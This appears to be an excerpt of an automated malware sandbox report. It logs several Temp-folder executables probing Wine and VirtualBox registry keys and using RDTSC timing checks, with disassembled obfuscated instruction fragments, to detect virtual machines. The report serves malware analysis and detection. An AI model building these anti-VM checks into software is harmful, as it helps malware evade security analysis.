Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 4FFE3F second address: 4FFE45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 4FFE45 second address: 4FFE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 4FFE49 second address: 4FFE4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 68678B second address: 68679B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F3B64CCE606h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 68679B second address: 6867AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3B648E95F6h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6867AA second address: 6867B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6867B0 second address: 6867BA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3B648E95F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 685732 second address: 685736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 685736 second address: 685746 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3B648E95F6h 0x00000008 jnc 00007F3B648E95F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 685746 second address: 68575A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3B64CCE60Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 68575A second address: 685760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 685760 second address: 685777 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jng 00007F3B64CCE612h 0x0000000f jg 00007F3B64CCE606h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 685777 second address: 685790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007F3B648E9602h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 685790 second address: 685799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 685BBA second address: 685BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 685BC0 second address: 685BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B64CCE60Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6884E4 second address: 6884ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6884ED second address: 688560 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F3B64CCE60Eh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F3B64CCE608h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D39CAh] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F3B64CCE608h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a call 00007F3B64CCE609h 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 688560 second address: 688564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 688564 second address: 688568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 688568 second address: 68858C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007F3B648E95FEh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 pushad 0x00000013 jg 00007F3B648E95F6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 68858C second address: 6885A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 js 00007F3B64CCE606h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 jl 00007F3B64CCE610h 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6885A8 second address: 688654 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007F3B648E95FCh 0x0000000f pop eax 0x00000010 mov dword ptr [ebp+122D2829h], esi 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F3B648E95F8h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 jo 00007F3B648E95FCh 0x00000038 mov dword ptr [ebp+122D1DA1h], ecx 0x0000003e xor dword ptr [ebp+122D1D7Ch], edx 0x00000044 push 00000000h 0x00000046 jp 00007F3B648E95FCh 0x0000004c jmp 00007F3B648E9604h 0x00000051 push 00000003h 0x00000053 jnc 00007F3B648E9607h 0x00000059 push BD8DE4D2h 0x0000005e pushad 0x0000005f je 00007F3B648E9609h 0x00000065 jmp 00007F3B648E9603h 0x0000006a push esi 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6886B5 second address: 6886E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3B64CCE616h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6886E8 second address: 6886EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6886EE second address: 68872B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F3B64CCE606h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov cx, dx 0x00000012 push 00000000h 0x00000014 mov dh, 8Fh 0x00000016 call 00007F3B64CCE609h 0x0000001b jnl 00007F3B64CCE60Ah 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F3B64CCE611h 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 68872B second address: 68874C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3B648E9603h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 68874C second address: 68876D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3B64CCE617h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push edi 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 68876D second address: 68878A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b jmp 00007F3B648E95FEh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 688894 second address: 68890F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push edx 0x0000000c pop edi 0x0000000d push 00000000h 0x0000000f sub esi, dword ptr [ebp+122D1D9Ch] 0x00000015 push 35A04D48h 0x0000001a jo 00007F3B64CCE611h 0x00000020 jmp 00007F3B64CCE60Bh 0x00000025 xor dword ptr [esp], 35A04DC8h 0x0000002c jmp 00007F3B64CCE614h 0x00000031 push 00000003h 0x00000033 adc cx, 839Bh 0x00000038 push 00000000h 0x0000003a mov esi, dword ptr [ebp+122D3AC2h] 0x00000040 push 00000003h 0x00000042 mov ch, al 0x00000044 push C94C7691h 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F3B64CCE619h 0x00000052 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 68890F second address: 688915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 688915 second address: 68891B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A8C1D second address: 6A8C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A8F0A second address: 6A8F26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE616h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A8F26 second address: 6A8F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A8F2A second address: 6A8F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A8F37 second address: 6A8F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3B648E95FFh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A922C second address: 6A9243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jnp 00007F3B64CCE606h 0x0000000e pop ecx 0x0000000f jng 00007F3B64CCE60Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A9243 second address: 6A924F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A924F second address: 6A9253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A9253 second address: 6A925C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A925C second address: 6A9262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A9262 second address: 6A9268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A93CE second address: 6A93F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F3B64CCE606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3B64CCE614h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A96C8 second address: 6A96D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3B648E95F6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A96D2 second address: 6A970E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE610h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c je 00007F3B64CCE606h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop eax 0x00000016 pushad 0x00000017 push esi 0x00000018 jmp 00007F3B64CCE613h 0x0000001d pushad 0x0000001e popad 0x0000001f pop esi 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A0933 second address: 6A0950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F3B648E9606h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A0950 second address: 6A096D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3B64CCE618h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6A096D second address: 6A0998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F3B648E95F6h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F3B648E9609h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6AA16D second address: 6AA1A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE60Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F3B64CCE626h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6AA1A3 second address: 6AA1B2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007F3B648E95F6h 0x0000000b pop edx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6AA300 second address: 6AA332 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F3B64CCE614h 0x0000000e jmp 00007F3B64CCE60Ch 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6AA332 second address: 6AA34B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jp 00007F3B648E95F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3B648E95FAh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6AA34B second address: 6AA35E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B64CCE60Fh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6AA48C second address: 6AA496 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3B648E95F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6AA496 second address: 6AA4B8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3B64CCE616h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6AA4B8 second address: 6AA4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6AA60F second address: 6AA617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6AA617 second address: 6AA61B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6AA61B second address: 6AA644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3B64CCE606h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007F3B64CCE614h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6AA644 second address: 6AA648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6AA919 second address: 6AA923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3B64CCE606h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6AF547 second address: 6AF54D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 681160 second address: 681168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 681168 second address: 681170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 681170 second address: 681174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6B1C0E second address: 6B1C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6B1C12 second address: 6B1C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6B6429 second address: 6B642F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6B65E3 second address: 6B65ED instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3B64CCE606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6B8299 second address: 6B829F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
